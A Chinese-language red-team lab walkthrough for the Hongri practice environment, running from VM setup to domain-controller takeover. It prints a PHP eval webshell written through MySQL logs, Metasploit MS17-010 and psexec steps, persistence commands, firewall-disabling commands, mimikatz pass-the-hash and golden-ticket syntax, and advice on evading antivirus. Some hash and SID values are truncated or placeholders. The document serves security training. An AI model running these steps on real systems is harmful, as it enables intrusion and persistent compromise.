新手也能懂的红队实战:从零搭建红日靶场到内网渗透完整复盘(附环境包)
红队实战入门:从零构建红日靶场到内网渗透全流程解析
环境准备与靶场搭建
红日靶场作为国内知名的渗透测试学习环境,其设计模拟了真实企业内网架构,包含Web服务器、域控服务器和域成员主机。对于初学者而言,正确搭建环境是后续所有操作的基础。我们先从虚拟机配置开始:
网络拓扑关键点:
- Web服务器(Windows 7)需要配置双网卡:
- NAT模式:192.168.134.135(外部访问)
- VMnet1:192.168.52.143(内网通信)
- 域控服务器(Windows Server 2008):192.168.52.138
- 域成员主机(Windows Server 2003):192.168.52.141
注意:所有虚拟机默认密码为hongrisec@2019,建议在实验环境中使用,正式环境必须修改
常见搭建问题解决方案:
| 问题现象 | 可能原因 | 解决方法 |
|---|---|---|
| 虚拟机无法联网 | 网卡模式错误 | 检查VMnet1是否启用Host-Only模式 |
| 靶机之间ping不通 | 防火墙未关闭 | 执行netsh advfirewall set allprofile state off |
| 服务无法启动 | 系统时间错误 | 调整虚拟机时间至2019年左右 |
信息收集与漏洞探测
完整的渗透测试中,信息收集往往占据70%的工作量。在红日靶场中,我们需要采用分层递进的收集策略:
- 基础信息扫描:
whatweb http://192.168.52.143 # 识别Web框架 dirsearch -u http://192.168.52.143 -e php # 目录扫描- 关键发现处理:
- 发现phpMyAdmin后台时,应立即检查版本:
-- 通过文档文件判断版本 SELECT @@version; -- 检查导出权限 SHOW VARIABLES LIKE 'secure_file_priv';- 突破点选择矩阵:
| 漏洞类型 | 利用难度 | 适用场景 | 工具推荐 |
|---|---|---|---|
| 弱口令爆破 | ★★☆ | 存在登录接口 | Burp Suite |
| 目录遍历 | ★☆☆ | 存在索引漏洞 | 御剑扫描器 |
| SQL注入 | ★★★ | 存在查询接口 | sqlmap |
权限获取与维持
通过phpMyAdmin获取Webshell是本次渗透的关键转折点,具体实现路径:
日志写入法详细步骤:
- 开启全局日志记录:
SET global general_log = 'ON'; SET global general_log_file = 'C:/phpStudy/WWW/shell.php';- 写入恶意代码:
SELECT '<?php @eval($_POST[cmd]);?>';- 使用蚁剑连接时需注意:
- 选择PHP类型连接
- 编码设置为UTF-8
- 超时时间调整为30000ms
经验提示:内网环境中,建议优先使用冰蝎等工具,其流量特征更隐蔽
权限提升检查清单:
- [ ] 查看系统补丁:
systeminfo - [ ] 检查服务权限:
accesschk.exe -uwcqv "Authenticated Users" * - [ ] 查找敏感文件:
dir /s *pass* == *.config
内网横向移动实战
获取立足点后,内网渗透需要系统化的推进策略:
域环境侦查命令集:
net group "Domain Admins" /domain # 查询域管理员 nltest /domain_trusts # 查询域信任关系 nslookup -type=SRV _ldap._tcp # 定位域控制器MS17-010漏洞利用优化方案:
- 使用Metasploit进行精准探测:
use auxiliary/scanner/smb/smb_ms17_010 set RHOSTS 192.168.52.141 set THREADS 3 run- 漏洞利用失败时的备选方案:
- 尝试psexec远程执行:
use exploit/windows/smb/psexec set SMBPass hongrisec@2019 set SMBUser Administrator权限维持技巧:
- 创建计划任务:
schtasks /create /tn "Update" /tr "C:\shell.exe" /sc minute /mo 1- 注册表自启动:
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Backup" /t REG_SZ /d "C:\shell.exe"域控攻防与总结
在最终获取域控权限的过程中,有几个关键转折点值得注意:
- 哈希传递攻击(PTH):
sekurlsa::pth /user:Administrator /domain:god.org /ntlm:31d6cfe0d16ae931b73c59d7e0c089c0- 黄金票据制作:
kerberos::golden /admin:Administrator /domain:god.org /sid:S-1-5-21-1218 /krbtgt:310b643c5316c8c3c70a10cf8365e /ticket:golden.kirbi实战中遇到的典型问题及解决记录:
- 域控防火墙规则拦截:通过已控主机执行
netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=TCP localport=3389 - 杀软拦截mimikatz:使用免杀版本或改用powershell版本
- 横向移动速度慢:设置
set AutoRunScript post/windows/manage/migrate自动迁移进程